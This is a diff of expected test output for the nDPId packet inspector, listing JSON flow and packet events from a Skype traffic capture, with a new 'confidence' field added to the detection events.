 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAux9AAEAGAGPAqAEib91Njsg7Abv27osgAAAAALAC\/\/8jHQAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -558,61 +558,61 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431970668803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970668803,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qSRAAEAGEmrAqAEib91Njsg7Abv27oshEKH0yoAQECzoZgAAAQEICj4yC49NkBYw"}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1LlEAAEARAb\/AqAEinTfrpjLdnE8AIZ69e3cC3u8ghDSSA4Gtev71JCe8ggQmBcfTOg=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyB6AAAEARJ\/jAqAEi1cezkTLdnFgAHgsae3kCyqgAJfxhjLbJRJUrPtsodh20jg=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+wKIAAEAR1+DAqAEiQTffKjLdnFgAKi+se3sC0K9BEnPeD0WuBXXm5wareR+WL1\/qIQP+x9YGu9Sm5Q=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":988,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1431970669372,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970669372,"pkt":"0NQSxnP1PBXCt3IOCABFAABA35sAAEARF57AqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1431970669372,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970669372,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIWEAAEAR1djAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1431970669927,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431970669927,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2E64AAEARG+XAqAEi1cezkjLdnF4AIuLme30CQ7dH2z2v6k8Do\/cqwHkYPEueogZ7yfU="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1431970669927,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431970669927,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9jJkAAEARWu7AqAEinTg0JjLdnE8AKRAHe38C0EXr0Mxbt14LCxM+eOaK\/XZWtSRnQDNWL9r8hWuf"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1431970670304,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970670304,"pkt":"0NQSxnP1PBXCt3IOCABFAABL\/QYAAEAR+ifAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
-00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431970670304,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970670304,"pkt":"0NQSxnP1PBXCt3IOCABFAABLI7cAAEAR03fAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
-00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1431970670460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970670460,"pkt":"0NQSxnP1PBXCt3IOCABFAABAdiAAAEARgRnAqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1431970670460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970670460,"pkt":"0NQSxnP1PBXCt3IOCABFAABAmMcAAEARXnLAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431970670941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970670941,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyyNoAAEARNhPAqAEib91KJjLdnE8AHkdoe4ECIl4YB+sv8264lsMD2bF6lk0ImA=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1431970670941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970670941,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyjX8AAEARWhHAqAEinTg0KDLdnFEAHlwwe4MCZJjbDEMF5Jp3fN4mrZ11ZfLW0g=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLhJoAAEARcpTAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
